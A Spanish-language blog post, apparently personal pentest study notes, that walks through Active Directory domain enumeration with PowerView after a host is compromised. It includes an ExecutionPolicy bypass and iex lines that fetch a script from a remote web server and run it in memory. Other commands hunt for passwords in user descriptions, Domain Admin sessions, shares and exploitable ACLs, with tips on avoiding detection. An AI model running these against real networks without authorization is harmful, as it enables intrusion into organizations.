---
draft: false
title: "Enumeracion de Dominio"
date: 2023-06-11T21:37:00+02:00
tags:
- hacking
- windows
---

Como comentabamos en [AD Hacking](https://karlossam.gitlab.io/sloth-blog/posts/ad-hacking), vamos a asumir que ya hemos conseguido comprometer algun equipo con una cuenta de dominio asociada.

En este punto nuestro objetivo es entender el entorno en el que estamos, especialmente de cara a ver como podemos abusar de sus configuraciones. Para esto vamos a usar principalmente 2 herramientas:
- Powerview: conjunto de funciones de Powershell que nos facilita enormemente enumerar el dominio. En concreto vamos a usar la version de ZeroDayLab que esta ligeramente mas actualizada: https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1
- ADModule: modulo oficial de Microsoft para Powershell que nos permite realizar diversas acciones relacionadas con el Active Directory.

Veamos las capacidades que nos ofrece cada uno

# Powerview

Antes de poder usar sus funciones debemos importarlo. Importante recordar que para hacer esto el `ExecutionPolicy` debe permitirlo, que podemos configurarlo para que asi sea mediante:

```powershell
powershell.exe -ExecutionPolicy bypass
```

Hecho esto podemos importarlo tanto de manera remota como en local:

```powershell
. C:\bin\PowerView.ps1 # Local
iex (New-Object Net.WebClient).DownloadString('http://webserver/PowerView.ps1') # Remoto
iex (iwr 'http://webserver/PowerView.ps1') # Remoto
```

Hecho esto, se nos abre el mundo de posibilidades que permite enumerar:

- **Dominio actual/otro**. Nos ofrece info como: Forest, DC's, Dominios Hijo, Nombre, SID, etc

```powershell
Get-Domain # Info del propio dominio
Get-Domain -Domain other.domain # Info de otro dominio
Get-DomainSID # SID del dominio
```

- **Politicas** del dominio actual/otro. *Password Policy*(para Password spraying), *Kerberos Policy*(max_age, max_renew, max_service, etc. Importante para Golden Ticket/Silver Ticket)

```powershell
Get-DomainPolicyData
Get-DomainPolicyData -Domain other.domain
```

- **DC's** del dominio actual/otro

```powershell
Get-DomainController
Get-DomainController -Domain other.domain
```

- **Usuarios**

```powershell
Get-DomainUser # Todos los usuarios del dominio
Get-DomainUser -Identity user1 # Especifico
Get-DomainUser -Identity user1 -Properties * # Todos los atributos de user especifico
Get-DomainUser -LDAPFilter "Description=*passw*" | Select name,Description # Filtrar por atributo. Util para cazar contraseñas en Desc
```

- **Grupos**

```powershell
Get-DomainGroup
Get-DomainGroup -Domain other.domain
Get-DomainGroup *admin* # Todos los grupos que contienen admin en el nombre
```

- **Miembros**

```powershell
Get-DomainGroupMember -Identity "Domain Admins" -Recurse # Todos los miembros de un grupo
Get-DomainGroup -Username "user1" # Grupos de un usuario
```

- **Grupos Locales**

```powershell
Get-NetLocalGroup -ComputerName serv1 # Necesita privilegios de admin en los no-DC
Get-NetLocalGroup -ComputerName serv1 -GroupName Administrators # Usuarios pertenecientes al grupo Admin
```

- **Cuentas de Equipos**

```powershell
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2022*" # Filtrar por OS
Get-DomainComputer -Ping # Comprueba conexion
```

- **Sesiones**. Necesita Local Admin

```powershell
Get-NetLoggedon -ComputerName serv2 # Usuarios activos loggeados
Get-LoggedonLocal -ComputerName serv2 # Usuarios loggeados localmente
Get-LastLoggedOn -ComputerName serv2 # Ultimo user loggeado
```

- **Sesiones de Domain Admin**. Tener en cuenta que **a partir de WS-2019 necesitas local admin** 

```powershell
Find-DomainUserLocation -Verbose # Maquinas con sesiones de Domain Admins
Find-DomainUserLocation -CheckAccess # Maquinas con sesiones de Domain Admins y permisos nuestros de local admin. En >=2019 no es necesario.
Find-DomainUserLocation -Stealth # Maquinas(File Servers y Distributed File Servers) con sesiones de Domain Admins
Find-DomainUserLocation -UserGroupIdentity "RDPUsers" # Cazar sesiones especificas
```

- **Shares**. Cuidado porque esto hace mucho ruido.

```powershell
Invoke-ShareFinder -Verbose # Todas las Shared del dominio
Invoke-FileFinder -Verbose # Busca archivos sensibles
Get-NetFileServer # FileServers del dominio
```

- **GPO**. Podremos enumerar los nombres y a quien aplica, pero no que hace la politica

```powershell
Get-DomainGPO 
Get-DomainGPO -Identity machine1 # GPO aplicada a maquina
Get-DomainGPO -Identity "{GUID}" # GPO aplicadas a una OU especifica por OU
Get-DomainGPOLocalGroup # Grupos restringidos > Usuarios interesantes
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity machine1 # Usuarios en grupos locales de maquina
Get-DomainGPOComputerLocalGroupMapping -Identity student1 -Verbose # Maquinas donde el user pertenece a un grupo
Get-DomainGPO -Identity (Get-DomainOU -Identity Externos).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72) # GPO Aplicadas a OU Externos
```

- **Organizational Unit**

```powershell
Get-DomainOU
(Get-DomainOU -Identity Externos).distinguishedname | %{Get-DomainComputer -SearchBase $_} | Select Name # Listar todos las maquinas en la OU Externos
```

- **ACL**

Cuidado con estas que es donde empieza a merece Bloodhound. Por ejemplo si estamos consultando las ACL del Obj1, y este pertenece a Obj2; no nos muestra de manera recursiva, por lo que perderiamos muchisima info.

```powershell
Get-DomainObjectAcl -SamAccountName user1 -ResolveGUIDS # ACL de Objeto por nombre
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=other,DC=domain" -ResolveGUIDS # ACL de Objeto por LDAP
Find-InterestingDomainAcl -ResolveGUIDS # Buscar ACL interesantes
Get-PathAcl -Path "\\serv1.other.domain\sysvol" # ACL asociada a Path
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | %{$_ | Add-Member NoteProperty 'IdentityName'} $(Convert-SidToName $_.securityIdentifier;$_) | ?{$_.IdentityName -match "user1"} # Buscar usuario entre las ACL que afectan a Domain Admins
```

- **Trust**

```powershell
Get-DomainTrust # Todas las confianzas del dominio
Get-DomainTrust -Domain other.domain # Con dominio especifico
Get-ForestTrust # Confianzas entre bosques
Get-ForestTrust -Forest another.domain # Confianzas Forest-Forest
```

- **Forest**

```powershell
Get-Forest # Detalles del bosque
Get-Forest -Forest another.domain # Detalles del bosque indicado
Get-ForestDomain # Dominios del bosque actual
Get-ForestDomain -Forest another.domain # Dominios del bosque actual
Get-ForestGlobalCatalog # Global Catalog actual
Get-ForestGlobalCatalog -Forest another.domain # Global Catalog especificado
```

- **Local Admin**

```powershell
Find-LocalAdminAccess -Verbose # Maquinas en las que tenemos local admin
```

## Busquedas avanzadas

Sabiendo un poquito de Powershell podemos mejorar notablemente algunos resultados como los que muestra `Get-DomainObjectAcl`, donde nos aparece el SID de la cuenta que tiene el permiso, pero no el nombre. Veamos primero el script y luego explicamos un poco lo que hace:

```powershell
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | %{$_ | Add-Member NoteProperty 'IdentityName'} $(Convert-SidToName $_.securityIdentifier;$_) | ?{$_.IdentityName -match "user1"}
```

Analicemos por cada `|`:
1. Recogemos las ACL que afectan directamente a 'Domain Admin'
2. Por cada objeto(`%{$_ `) le añadimos un atributo 'IdentityName', que es la conversion del SID a su nombre
3. Filtramos cada objeto (`?{$_ `) para ver si su IdentityName coincide con "user1"

Al final los que estamos haciendo con esto es comprobar si existe alguna ACL que afecta a Domain Admins y el que posee ese permiso es user1

# Conclusiones

Powerview nos ofrece una gran cantidad de posibilidades en cuanto a enumeracion del dominio. Pese a que todas en general pueden aportar su valor, recomendaria lanzar algunas concretas siempre debido a que no son tan circunstanciales como pueden ser otras.

Esto recordando siempre que tampoco es que tenga mucha experiencia en esto y posiblemente sea muy mejorable la idea. Especialmente tengamos en cuenta que hay muchas que van a hacer muchisimo ruido y como las OpSec sean una preocupacion pueden delatarnos

```powershell
Get-Domain
Get-DomainPolicyData
Get-DomainController
Get-Forest
Get-ForestDomain # Si aparecen otros, repetir proceso añadiendo -Domain DOMINIOS
Get-DomainUser -Identity $(whoami) -Properties *
Get-DomainGroup -Username $(whoami)
# No OpSec
Invoke-ShareFinder -Verbose
Invoke-FileFinder -Verbose
Find-InterestingDomainAcl -ResolveGUIDS | %{$_ | Add-Member NoteProperty 'IdentityName'} $(Convert-SidToName $_.securityIdentifier;$_) # No estoy seguro de que este funcione
Find-LocalAdminAccess -Verbose
Find-DomainUserLocation -CheckAccess
```

A partir de aqui ya todo depende de ir escalando privilegios y enumerar cositas que veamos sospechosas.

En los proximos capitulos veremos como hacer esto con Bloodhound siendo muchisimo mas ruidosos, y mediante ADModule siendo menos.

>Este post especialmente va a ser un WorkInProgress durante un tiempo, debido a que es un tema que aun estoy explorando y puede que cambie muchas veces de opinion.